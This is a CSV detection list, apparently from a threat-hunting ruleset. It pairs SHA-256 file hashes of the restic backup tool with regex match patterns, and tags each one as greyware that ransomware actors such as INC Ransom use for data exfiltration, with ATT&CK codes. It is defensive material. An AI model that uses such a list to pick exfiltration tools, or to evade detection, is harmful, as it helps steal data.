"*8c341c2d36bae1817b1f31b77d5cc68dce21f30e59dd7ccc444d7b82ac88b7cc*",".{0,1000}8c341c2d36bae1817b1f31b77d5cc68dce21f30e59dd7ccc444d7b82ac88b7cc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8c3ca5ddeffaef4c8481b69314dc10d2d8b7da4a2e57b4ad381596d15e9767d2*",".{0,1000}8c3ca5ddeffaef4c8481b69314dc10d2d8b7da4a2e57b4ad381596d15e9767d2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8c76b3f974e99232e25a8e2e3f04d15edf581ee94f9deff8ffb147c817359882*",".{0,1000}8c76b3f974e99232e25a8e2e3f04d15edf581ee94f9deff8ffb147c817359882.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8d2056b0dbb106c28a58f7652a7a40da94e417c951638831e2687ddbbc253594*",".{0,1000}8d2056b0dbb106c28a58f7652a7a40da94e417c951638831e2687ddbbc253594.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8ddef07fe02333400b850d0893f14117ee05dd831c877a08e54a247da9e2fdbc*",".{0,1000}8ddef07fe02333400b850d0893f14117ee05dd831c877a08e54a247da9e2fdbc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8e24b029f4c9625430ab652fd81f3250c0f6d04390f7c5e7f7f19b4a7b9273d0*",".{0,1000}8e24b029f4c9625430ab652fd81f3250c0f6d04390f7c5e7f7f19b4a7b9273d0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8e52ca779ef1c3d2bc568eb729c3e2452cb767e091348ec45d374dcc4ddf6ec3*",".{0,1000}8e52ca779ef1c3d2bc568eb729c3e2452cb767e091348ec45d374dcc4ddf6ec3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8f68e92980c29558c0ad80dd89fb6823a710c7545a08ea061318f67e4fedc6db*",".{0,1000}8f68e92980c29558c0ad80dd89fb6823a710c7545a08ea061318f67e4fedc6db.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8f8eee3e9651b9f7384a323ba3c26a5667a6388ab2ef8e6d869d3cd69b9f7c95*",".{0,1000}8f8eee3e9651b9f7384a323ba3c26a5667a6388ab2ef8e6d869d3cd69b9f7c95.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*8fe928a203b33b847646d9d0e9dcf825903f7379266fab08ec5e44ddec9aa4ed*",".{0,1000}8fe928a203b33b847646d9d0e9dcf825903f7379266fab08ec5e44ddec9aa4ed.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9010d659ebb3159009acff108d94c8347aa48f1c41c12176a6c7142ef7ddfd05*",".{0,1000}9010d659ebb3159009acff108d94c8347aa48f1c41c12176a6c7142ef7ddfd05.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9062e56b98173ae9b000e2cf867d388577442863c83ac3b6a48e90a776cf75ad*",".{0,1000}9062e56b98173ae9b000e2cf867d388577442863c83ac3b6a48e90a776cf75ad.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*90ff7409de18be284f8b8e1babe716d653f74b225b37704448fc46edb4b04c3a*",".{0,1000}90ff7409de18be284f8b8e1babe716d653f74b225b37704448fc46edb4b04c3a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*911a1b84f2100d2ac691c0bb28955fd2ab65e76cb2dbe651b21f6072a508e2be*",".{0,1000}911a1b84f2100d2ac691c0bb28955fd2ab65e76cb2dbe651b21f6072a508e2be.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9198c43abd08b3a09ea59226282447316e13da579713dda2d81a28c37902d2c8*",".{0,1000}9198c43abd08b3a09ea59226282447316e13da579713dda2d81a28c37902d2c8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*91ab146f1353958d24cc4d3c909de7bfb2d83abc348e5aa96dd57262c38a024f*",".{0,1000}91ab146f1353958d24cc4d3c909de7bfb2d83abc348e5aa96dd57262c38a024f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*91b92f7f1c87b8b7ebf5ccc9b986fff74322cb349492852f6bfe7eb44bf8b3d1*",".{0,1000}91b92f7f1c87b8b7ebf5ccc9b986fff74322cb349492852f6bfe7eb44bf8b3d1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9242f2e59ea99bd890e8f92b95a91a4237df9572fc93c6bc64997d5705ae03bc*",".{0,1000}9242f2e59ea99bd890e8f92b95a91a4237df9572fc93c6bc64997d5705ae03bc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9245cafed0bc3f0531950cb8f31e3b7c2711a2785c79ec088d554bb8fe16ae81*",".{0,1000}9245cafed0bc3f0531950cb8f31e3b7c2711a2785c79ec088d554bb8fe16ae81.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*92a895f1fc289a338ff9008045e94525099421d66829dece14c9eb880f685280*",".{0,1000}92a895f1fc289a338ff9008045e94525099421d66829dece14c9eb880f685280.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*92aa5912f3ba113f7a763afae465ec6cae0542db7e81a544e84db144526ca887*",".{0,1000}92aa5912f3ba113f7a763afae465ec6cae0542db7e81a544e84db144526ca887.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*92e6621b5b0f2972111efcfc6e09c3102e1872d2358350901deea1d2d363776a*",".{0,1000}92e6621b5b0f2972111efcfc6e09c3102e1872d2358350901deea1d2d363776a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*93bd89817c42e31310485eaa1532e6431b557e2b2850f9dcbfa5cd6b4b60b189*",".{0,1000}93bd89817c42e31310485eaa1532e6431b557e2b2850f9dcbfa5cd6b4b60b189.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9426eb3d0fe973759d8337e545a88489798fe415c608c0fe29cceabeac8f63ab*",".{0,1000}9426eb3d0fe973759d8337e545a88489798fe415c608c0fe29cceabeac8f63ab.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*94d14e87eee41566909017eb8847693a2c1d81c3d448e8c01b1042be30757924*",".{0,1000}94d14e87eee41566909017eb8847693a2c1d81c3d448e8c01b1042be30757924.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*959bfdfe33740591330185406539399037eace2cd21bad62dc057db6ffd30656*",".{0,1000}959bfdfe33740591330185406539399037eace2cd21bad62dc057db6ffd30656.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*95d33e96934486c49553d1c4f2371d92b257795dc8318ffcbded329117e83145*",".{0,1000}95d33e96934486c49553d1c4f2371d92b257795dc8318ffcbded329117e83145.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*96167e823996cae90da9da2c7e686d966028b8204d0cb92f12535e055d15cb9a*",".{0,1000}96167e823996cae90da9da2c7e686d966028b8204d0cb92f12535e055d15cb9a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*96257ac3f78ba98e844960d52a2341815c3c9af0d5293cf0dc253a1b7f2a7c55*",".{0,1000}96257ac3f78ba98e844960d52a2341815c3c9af0d5293cf0dc253a1b7f2a7c55.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*969e56154298f0996396bf310bb745cfa549b2396765a49dc1611db1f118d2ca*",".{0,1000}969e56154298f0996396bf310bb745cfa549b2396765a49dc1611db1f118d2ca.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*96ac901e030641264cde78441b64bb6e20e2e1eb33b55b79408ecfd23bacbc7d*",".{0,1000}96ac901e030641264cde78441b64bb6e20e2e1eb33b55b79408ecfd23bacbc7d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*96fc55faff503465ff38e6bbbb21fc6365f11b52756d0b82db3a52b3f5487af7*",".{0,1000}96fc55faff503465ff38e6bbbb21fc6365f11b52756d0b82db3a52b3f5487af7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9796b2639dcac4c2a68c53344b8382ce959d1b1e68798a9bf7877353c9ad2a3b*",".{0,1000}9796b2639dcac4c2a68c53344b8382ce959d1b1e68798a9bf7877353c9ad2a3b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*97c9f305d684472b85157d1a2acc15364fa1999a25ddf50b40f5e76ef2fb8961*",".{0,1000}97c9f305d684472b85157d1a2acc15364fa1999a25ddf50b40f5e76ef2fb8961.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9827be6db4d39ec8963785cc91b176304d9cf7896820b65dbabe6bbe8eaef0bf*",".{0,1000}9827be6db4d39ec8963785cc91b176304d9cf7896820b65dbabe6bbe8eaef0bf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9834dd77457930e3d90e08bb26c0d14c29fd01dd9fb51292c1ac16cc93041abc*",".{0,1000}9834dd77457930e3d90e08bb26c0d14c29fd01dd9fb51292c1ac16cc93041abc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*98394683d8f30ce9fb313100f593dc16e97a52723b18d534cf586391a97cdc1d*",".{0,1000}98394683d8f30ce9fb313100f593dc16e97a52723b18d534cf586391a97cdc1d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*98f818a90ad8640c5f56c5d73ce5bc45ac0857d8a9d8d173d0101ee7e4aa19fe*",".{0,1000}98f818a90ad8640c5f56c5d73ce5bc45ac0857d8a9d8d173d0101ee7e4aa19fe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*99759813456c7857b5792debb24f09d98f946bf012f8436e94420c7195701bbd*",".{0,1000}99759813456c7857b5792debb24f09d98f946bf012f8436e94420c7195701bbd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9acc803db3f5e4b87282da31d1f402958f6344c90afd74abd5609bd0a9449b56*",".{0,1000}9acc803db3f5e4b87282da31d1f402958f6344c90afd74abd5609bd0a9449b56.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9af5233ce7294cec25fa60e36a47dd8d0eac6fe4d0f6ab1180291545f4dcf5b6*",".{0,1000}9af5233ce7294cec25fa60e36a47dd8d0eac6fe4d0f6ab1180291545f4dcf5b6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9b3dde2aa24d611f7042f7248ec066f29d243b8b351a1530d5b2cea145c6dfaa*",".{0,1000}9b3dde2aa24d611f7042f7248ec066f29d243b8b351a1530d5b2cea145c6dfaa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9b5ac6a354462e1d547aa65f9c29632092a93861190b3c0a03534b1ec016a5e1*",".{0,1000}9b5ac6a354462e1d547aa65f9c29632092a93861190b3c0a03534b1ec016a5e1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9b7e9ebb1641ab9798d06e550317afc5999c25eff3abe28a8f21b6344fab7622*",".{0,1000}9b7e9ebb1641ab9798d06e550317afc5999c25eff3abe28a8f21b6344fab7622.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9c3aa9197679d1cee2f74e0e1938ebc759648520d3cfb02dfb7f0422bd234e2b*",".{0,1000}9c3aa9197679d1cee2f74e0e1938ebc759648520d3cfb02dfb7f0422bd234e2b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9d2f44538ea0c6309426cb290d3a6b8b0b85de5de7f1496ff40c843b36bf8a8d*",".{0,1000}9d2f44538ea0c6309426cb290d3a6b8b0b85de5de7f1496ff40c843b36bf8a8d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9d3d2e4222e2352d476cfe71afba982fcabd38e2e5c27a43bc126de2c33e353b*",".{0,1000}9d3d2e4222e2352d476cfe71afba982fcabd38e2e5c27a43bc126de2c33e353b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9ec893fc952f4e45307f8cd603b6de2f396e1ad757af6847c00a148257c0dfb7*",".{0,1000}9ec893fc952f4e45307f8cd603b6de2f396e1ad757af6847c00a148257c0dfb7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9ee0e699972c2614e3b1eb3c803caff659a64bb8d2c14ba07d520944758cf0a6*",".{0,1000}9ee0e699972c2614e3b1eb3c803caff659a64bb8d2c14ba07d520944758cf0a6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*9ffa244293433033702bbbbddf85e116221a7ff75c0b2bd152d9da8b6263ea6f*",".{0,1000}9ffa244293433033702bbbbddf85e116221a7ff75c0b2bd152d9da8b6263ea6f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a0f82a1dfbc7ff306b986ef88ecd57d1ab08f499cee267184bd5cdb5d9bad6a6*",".{0,1000}a0f82a1dfbc7ff306b986ef88ecd57d1ab08f499cee267184bd5cdb5d9bad6a6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a10a8b566860339bfd6832fc9073862c8689a1645236ad3d4eafa500f9c536a4*",".{0,1000}a10a8b566860339bfd6832fc9073862c8689a1645236ad3d4eafa500f9c536a4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a1ad8df9d1ea7ad06e8d124238448640fdaadc708b61e38ca378de15aac47e5a*",".{0,1000}a1ad8df9d1ea7ad06e8d124238448640fdaadc708b61e38ca378de15aac47e5a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a1bc2b5bd61ba0f7babdec16c86b0715156d3577dbdbcd2863a2b2fa19df7606*",".{0,1000}a1bc2b5bd61ba0f7babdec16c86b0715156d3577dbdbcd2863a2b2fa19df7606.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a1fccf26ba0a2f7ae387b9e639c8e87885ac5fca39e9eb3a24d7386d296252c2*",".{0,1000}a1fccf26ba0a2f7ae387b9e639c8e87885ac5fca39e9eb3a24d7386d296252c2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a1fec79b3327cadea501d3dda9437a38184fc2ef3981f1b8d92245aaf8213007*",".{0,1000}a1fec79b3327cadea501d3dda9437a38184fc2ef3981f1b8d92245aaf8213007.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a20cd9ca2f6e691c531cf7d30c46bfadce77e609c90a5fe4b37254f14e5a934f*",".{0,1000}a20cd9ca2f6e691c531cf7d30c46bfadce77e609c90a5fe4b37254f14e5a934f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a2299ebe21ea5937b4a8b561f951eb0baab03299431b2142af521ff7f230045b*",".{0,1000}a2299ebe21ea5937b4a8b561f951eb0baab03299431b2142af521ff7f230045b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a27ce45798527f143d059cfecd0d2c8e976da75ae6c70f4eaeced862062f044d*",".{0,1000}a27ce45798527f143d059cfecd0d2c8e976da75ae6c70f4eaeced862062f044d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a393bd2a8a781b63fd58b3b343222ff70c8f7669be23078f844a101144368800*",".{0,1000}a393bd2a8a781b63fd58b3b343222ff70c8f7669be23078f844a101144368800.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a3eacf76e0d6b305982cba0115dff905c8de86bd2768011b41338f8d276e0c1c*",".{0,1000}a3eacf76e0d6b305982cba0115dff905c8de86bd2768011b41338f8d276e0c1c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a4239ce6da7f2934b3d732865bbfe7a866efbdcda80258bc4a247d3def967f9c*",".{0,1000}a4239ce6da7f2934b3d732865bbfe7a866efbdcda80258bc4a247d3def967f9c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a47c13e667e16a8598e32ae5ed11e2d04dc8846af682ea3aebe42716e964a278*",".{0,1000}a47c13e667e16a8598e32ae5ed11e2d04dc8846af682ea3aebe42716e964a278.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
